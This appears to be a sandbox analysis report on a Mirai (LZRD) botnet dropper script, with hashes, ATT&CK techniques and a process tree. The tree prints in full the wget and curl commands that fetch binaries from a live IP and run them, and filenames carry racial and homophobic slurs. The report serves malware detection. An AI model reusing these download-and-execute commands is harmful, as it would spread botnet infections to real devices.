mirai | 9724ec0ed2f79f63d1e62dbf2da4a1ffe5b81d8446230f33795427bba5a57e3a

Analysis

max time kernel
149s
max time network
140s
platform
debian-9_mipsel
resource
debian9-mipsel-20240418-en
resource tags

arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
18-01-2025 04:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh
Size

4KB
MD5

c458138484ec7b830d632fd383d3d321
SHA1

0e7c076b71401207c7568f50f897110ea98f9d73
SHA256

9724ec0ed2f79f63d1e62dbf2da4a1ffe5b81d8446230f33795427bba5a57e3a
SHA512

e0a9fb2dcae645581a9f57372d93c30b6b4c906fc888582e91c4ef0de4b6dce961bcca0440f56164ad5354de41e91aab0fcb38dbee4fd0b7db2249fe75cd01fd
SSDEEP

48:vXkTv3X9CTXiFLXF6vX/4vXL02th3Xri5lXodNL3X7E2aLX877JX9CTXJ+LX2ZTS:v6aiqGtDis3kL2K+WriR

Score

10^/10

mirai lzrd botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
798	chmod
806	chmod
898	chmod
740	chmod
747	chmod
851	chmod
865	chmod
871	chmod
880	chmod
829	chmod
845	chmod
904	chmod
886	chmod
892	chmod
859	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/HAHAWTFNIGGA	741	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	748	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	799	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	807	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	831	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	846	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	852	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	860	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	866	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	872	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	881	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	887	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	893	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	899	HAHAWTFNIGGA
/tmp/HAHAWTFNIGGA	905	HAHAWTFNIGGA

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	HAHAWTFNIGGA
File opened for modification	/dev/misc/watchdog	HAHAWTFNIGGA

Writes file to system bin folder 2 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	HAHAWTFNIGGA
File opened for modification	/bin/watchdog	HAHAWTFNIGGA

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/fstream-1.dat	upx
behavioral4/files/fstream-4.dat	upx
behavioral4/files/fstream-12.dat	upx
behavioral4/files/fstream-15.dat	upx
behavioral4/files/fstream-18.dat	upx
behavioral4/files/fstream-20.dat	upx
behavioral4/files/fstream-22.dat	upx
behavioral4/files/fstream-24.dat	upx
behavioral4/files/fstream-26.dat	upx
behavioral4/files/fstream-28.dat	upx

Reads runtime system information 36 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/688/cmdline	HAHAWTFNIGGA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/708/cmdline	HAHAWTFNIGGA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/895/cmdline	HAHAWTFNIGGA
File opened for reading	/proc/702/cmdline	HAHAWTFNIGGA
File opened for reading	/proc/717/cmdline	HAHAWTFNIGGA
File opened for reading	/proc/901/cmdline	HAHAWTFNIGGA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/664/cmdline	HAHAWTFNIGGA
File opened for reading	/proc/710/cmdline	HAHAWTFNIGGA
File opened for reading	/proc/902/cmdline	HAHAWTFNIGGA
File opened for reading	/proc/473/cmdline	HAHAWTFNIGGA
File opened for reading	/proc/709/cmdline	HAHAWTFNIGGA
File opened for reading	/proc/855/cmdline	HAHAWTFNIGGA
File opened for reading	/proc/869/cmdline	HAHAWTFNIGGA
File opened for reading	/proc/884/cmdline	HAHAWTFNIGGA
File opened for reading	/proc/889/cmdline	HAHAWTFNIGGA
File opened for reading	/proc/890/cmdline	HAHAWTFNIGGA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/875/cmdline	HAHAWTFNIGGA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/667/cmdline	HAHAWTFNIGGA
File opened for reading	/proc/671/cmdline	HAHAWTFNIGGA
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/670/cmdline	HAHAWTFNIGGA
File opened for reading	/proc/707/cmdline	HAHAWTFNIGGA
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 4 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
743	wget
745	curl
746	cat
748	HAHAWTFNIGGA

Writes file to tmp directory 30 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_i686	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arm5	wget
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arm7	wget
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arm7	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_x86	wget
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_x86	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_mips	wget
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_mips	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_x86_64	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arm6	wget
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_ppc	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_m68k	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_i686	wget
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arm	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arm5	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_m68k	wget
File opened for modification	/tmp/HAHAWTFNIGGA	GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arc	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arm	wget
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_ppc	wget
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arm6	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_spc	wget
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_sh4	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arc	wget
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_mpsl	wget
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_mpsl	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_spc	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_i468	curl
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_x86_64	wget
File opened for modification	/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_sh4	wget

/tmp/GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh
/tmp/GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh
1⤵
- Writes file to tmp directory
PID:710
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_x86
  2⤵
  - Writes file to tmp directory
  PID:714
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:732
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_x86
  2⤵
  PID:739
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-0ed40a9e127f41699077075a5bd2978f-systemd-timedated.service-o2Wzha YOUCANTGETTHESEBINSFAGGOT12322257_x86
  2⤵
  - File and Directory Permissions Modification
  PID:740
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.x86
  2⤵
  - Executes dropped EXE
  PID:741
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:743
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:745
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_mips
  2⤵
  - System Network Configuration Discovery
  PID:746
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-0ed40a9e127f41699077075a5bd2978f-systemd-timedated.service-o2Wzha YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_x86
  2⤵
  - File and Directory Permissions Modification
  PID:747
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.mips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:748
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_arc
  2⤵
  - Writes file to tmp directory
  PID:750
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_arc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:791
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_arc
  2⤵
  PID:797
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-0ed40a9e127f41699077075a5bd2978f-systemd-timedated.service-o2Wzha YOUCANTGETTHESEBINSFAGGOT12322257_arc YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_x86
  2⤵
  - File and Directory Permissions Modification
  PID:798
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.arc
  2⤵
  - Executes dropped EXE
  PID:799
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_i468
  2⤵
  PID:801
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_i468
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:802
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_i468
  2⤵
  PID:805
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-0ed40a9e127f41699077075a5bd2978f-systemd-timedated.service-o2Wzha YOUCANTGETTHESEBINSFAGGOT12322257_arc YOUCANTGETTHESEBINSFAGGOT12322257_i468 YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_x86
  2⤵
  - File and Directory Permissions Modification
  PID:806
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.i486
  2⤵
  - Executes dropped EXE
  PID:807
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_i686
  2⤵
  - Writes file to tmp directory
  PID:810
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_i686
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:817
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_i686
  2⤵
  PID:828
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-0ed40a9e127f41699077075a5bd2978f-systemd-timedated.service-o2Wzha YOUCANTGETTHESEBINSFAGGOT12322257_arc YOUCANTGETTHESEBINSFAGGOT12322257_i468 YOUCANTGETTHESEBINSFAGGOT12322257_i686 YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_x86
  2⤵
  - File and Directory Permissions Modification
  PID:829
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.i686
  2⤵
  - Executes dropped EXE
  PID:831
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_x86_64
  2⤵
  - Writes file to tmp directory
  PID:834
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_x86_64
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:843
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_x86_64
  2⤵
  PID:844
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-0ed40a9e127f41699077075a5bd2978f-systemd-timedated.service-o2Wzha YOUCANTGETTHESEBINSFAGGOT12322257_arc YOUCANTGETTHESEBINSFAGGOT12322257_i468 YOUCANTGETTHESEBINSFAGGOT12322257_i686 YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_x86 YOUCANTGETTHESEBINSFAGGOT12322257_x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:845
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.x86
  2⤵
  - Executes dropped EXE
  PID:846
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_mpsl
  2⤵
  - Writes file to tmp directory
  PID:848
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:849
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_mpsl
  2⤵
  PID:850
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-0ed40a9e127f41699077075a5bd2978f-systemd-timedated.service-o2Wzha YOUCANTGETTHESEBINSFAGGOT12322257_arc YOUCANTGETTHESEBINSFAGGOT12322257_i468 YOUCANTGETTHESEBINSFAGGOT12322257_i686 YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_mpsl YOUCANTGETTHESEBINSFAGGOT12322257_x86 YOUCANTGETTHESEBINSFAGGOT12322257_x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:851
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.mpsl
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:852
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_arm
  2⤵
  - Writes file to tmp directory
  PID:856
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_arm
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:857
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_arm
  2⤵
  PID:858
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-0ed40a9e127f41699077075a5bd2978f-systemd-timedated.service-o2Wzha YOUCANTGETTHESEBINSFAGGOT12322257_arc YOUCANTGETTHESEBINSFAGGOT12322257_arm YOUCANTGETTHESEBINSFAGGOT12322257_i468 YOUCANTGETTHESEBINSFAGGOT12322257_i686 YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_mpsl YOUCANTGETTHESEBINSFAGGOT12322257_x86 YOUCANTGETTHESEBINSFAGGOT12322257_x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:859
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.arm
  2⤵
  - Executes dropped EXE
  PID:860
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_arm5
  2⤵
  - Writes file to tmp directory
  PID:862
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_arm5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:863
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_arm5
  2⤵
  PID:864
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-0ed40a9e127f41699077075a5bd2978f-systemd-timedated.service-o2Wzha YOUCANTGETTHESEBINSFAGGOT12322257_arc YOUCANTGETTHESEBINSFAGGOT12322257_arm YOUCANTGETTHESEBINSFAGGOT12322257_arm5 YOUCANTGETTHESEBINSFAGGOT12322257_i468 YOUCANTGETTHESEBINSFAGGOT12322257_i686 YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_mpsl YOUCANTGETTHESEBINSFAGGOT12322257_x86 YOUCANTGETTHESEBINSFAGGOT12322257_x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:865
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.arm5
  2⤵
  - Executes dropped EXE
  PID:866
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_arm6
  2⤵
  - Writes file to tmp directory
  PID:868
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_arm6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:869
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_arm6
  2⤵
  PID:870
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA systemd-private-0ed40a9e127f41699077075a5bd2978f-systemd-timedated.service-o2Wzha YOUCANTGETTHESEBINSFAGGOT12322257_arc YOUCANTGETTHESEBINSFAGGOT12322257_arm YOUCANTGETTHESEBINSFAGGOT12322257_arm5 YOUCANTGETTHESEBINSFAGGOT12322257_arm6 YOUCANTGETTHESEBINSFAGGOT12322257_i468 YOUCANTGETTHESEBINSFAGGOT12322257_i686 YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_mpsl YOUCANTGETTHESEBINSFAGGOT12322257_x86 YOUCANTGETTHESEBINSFAGGOT12322257_x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:871
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.arm6
  2⤵
  - Executes dropped EXE
  PID:872
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_arm7
  2⤵
  - Writes file to tmp directory
  PID:874
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_arm7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:875
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_arm7
  2⤵
  PID:879
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA YOUCANTGETTHESEBINSFAGGOT12322257_arc YOUCANTGETTHESEBINSFAGGOT12322257_arm YOUCANTGETTHESEBINSFAGGOT12322257_arm5 YOUCANTGETTHESEBINSFAGGOT12322257_arm6 YOUCANTGETTHESEBINSFAGGOT12322257_arm7 YOUCANTGETTHESEBINSFAGGOT12322257_i468 YOUCANTGETTHESEBINSFAGGOT12322257_i686 YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_mpsl YOUCANTGETTHESEBINSFAGGOT12322257_x86 YOUCANTGETTHESEBINSFAGGOT12322257_x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:880
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.arm7
  2⤵
  - Executes dropped EXE
  PID:881
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_ppc
  2⤵
  - Writes file to tmp directory
  PID:883
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_ppc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:884
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_ppc
  2⤵
  PID:885
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA YOUCANTGETTHESEBINSFAGGOT12322257_arc YOUCANTGETTHESEBINSFAGGOT12322257_arm YOUCANTGETTHESEBINSFAGGOT12322257_arm5 YOUCANTGETTHESEBINSFAGGOT12322257_arm6 YOUCANTGETTHESEBINSFAGGOT12322257_arm7 YOUCANTGETTHESEBINSFAGGOT12322257_i468 YOUCANTGETTHESEBINSFAGGOT12322257_i686 YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_mpsl YOUCANTGETTHESEBINSFAGGOT12322257_ppc YOUCANTGETTHESEBINSFAGGOT12322257_x86 YOUCANTGETTHESEBINSFAGGOT12322257_x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:886
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.ppc
  2⤵
  - Executes dropped EXE
  PID:887
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_spc
  2⤵
  - Writes file to tmp directory
  PID:889
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_spc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:890
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_spc
  2⤵
  PID:891
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA YOUCANTGETTHESEBINSFAGGOT12322257_arc YOUCANTGETTHESEBINSFAGGOT12322257_arm YOUCANTGETTHESEBINSFAGGOT12322257_arm5 YOUCANTGETTHESEBINSFAGGOT12322257_arm6 YOUCANTGETTHESEBINSFAGGOT12322257_arm7 YOUCANTGETTHESEBINSFAGGOT12322257_i468 YOUCANTGETTHESEBINSFAGGOT12322257_i686 YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_mpsl YOUCANTGETTHESEBINSFAGGOT12322257_ppc YOUCANTGETTHESEBINSFAGGOT12322257_spc YOUCANTGETTHESEBINSFAGGOT12322257_x86 YOUCANTGETTHESEBINSFAGGOT12322257_x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:892
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.spc
  2⤵
  - Executes dropped EXE
  PID:893
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_m68k
  2⤵
  - Writes file to tmp directory
  PID:895
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_m68k
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:896
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_m68k
  2⤵
  PID:897
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA YOUCANTGETTHESEBINSFAGGOT12322257_arc YOUCANTGETTHESEBINSFAGGOT12322257_arm YOUCANTGETTHESEBINSFAGGOT12322257_arm5 YOUCANTGETTHESEBINSFAGGOT12322257_arm6 YOUCANTGETTHESEBINSFAGGOT12322257_arm7 YOUCANTGETTHESEBINSFAGGOT12322257_i468 YOUCANTGETTHESEBINSFAGGOT12322257_i686 YOUCANTGETTHESEBINSFAGGOT12322257_m68k YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_mpsl YOUCANTGETTHESEBINSFAGGOT12322257_ppc YOUCANTGETTHESEBINSFAGGOT12322257_spc YOUCANTGETTHESEBINSFAGGOT12322257_x86 YOUCANTGETTHESEBINSFAGGOT12322257_x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:898
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.m68k
  2⤵
  - Executes dropped EXE
  PID:899
- /usr/bin/wget
  wget http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_sh4
  2⤵
  - Writes file to tmp directory
  PID:901
- /usr/bin/curl
  curl -O http://94.158.245.27/GOONGANGONTOP/YOUCANTGETTHESEBINSFAGGOT12322257_sh4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:902
- /bin/cat
  cat YOUCANTGETTHESEBINSFAGGOT12322257_sh4
  2⤵
  PID:903
- /bin/chmod
  chmod +x GODLYBINSNIGGAYOUCANTCRACKTHESEBITCH11111222268.sh HAHAWTFNIGGA YOUCANTGETTHESEBINSFAGGOT12322257_arc YOUCANTGETTHESEBINSFAGGOT12322257_arm YOUCANTGETTHESEBINSFAGGOT12322257_arm5 YOUCANTGETTHESEBINSFAGGOT12322257_arm6 YOUCANTGETTHESEBINSFAGGOT12322257_arm7 YOUCANTGETTHESEBINSFAGGOT12322257_i468 YOUCANTGETTHESEBINSFAGGOT12322257_i686 YOUCANTGETTHESEBINSFAGGOT12322257_m68k YOUCANTGETTHESEBINSFAGGOT12322257_mips YOUCANTGETTHESEBINSFAGGOT12322257_mpsl YOUCANTGETTHESEBINSFAGGOT12322257_ppc YOUCANTGETTHESEBINSFAGGOT12322257_sh4 YOUCANTGETTHESEBINSFAGGOT12322257_spc YOUCANTGETTHESEBINSFAGGOT12322257_x86 YOUCANTGETTHESEBINSFAGGOT12322257_x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:904
- /tmp/HAHAWTFNIGGA
  ./HAHAWTFNIGGA payload.sh4
  2⤵
  - Executes dropped EXE
  PID:905

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/HAHAWTFNIGGA

Filesize
81KB

MD5
26351d226a4e7b04aa180a044dba1d14

SHA1
82709b83511bab77d6aea2ad1283b5470570aff3

SHA256
70d6b5db633fa0992d1a3d0e625b3d530f840dc5971273c2707285d34c7bc9b1

SHA512
a47f6c44eae33b2ed3d7809cd3e0d31ba158ca686fe4c3f3162f80d5fb110b1dd268379df8e95ff193613694a0946dadb14add6f85f7e7214bc96d7442b2bd74

Download Submit
/tmp/YOUCANTGETTHESEBINSFAGGOT12322257_arc

Filesize
121KB

MD5
b2137fad57343a2c54f4167b42c52b4f

SHA1
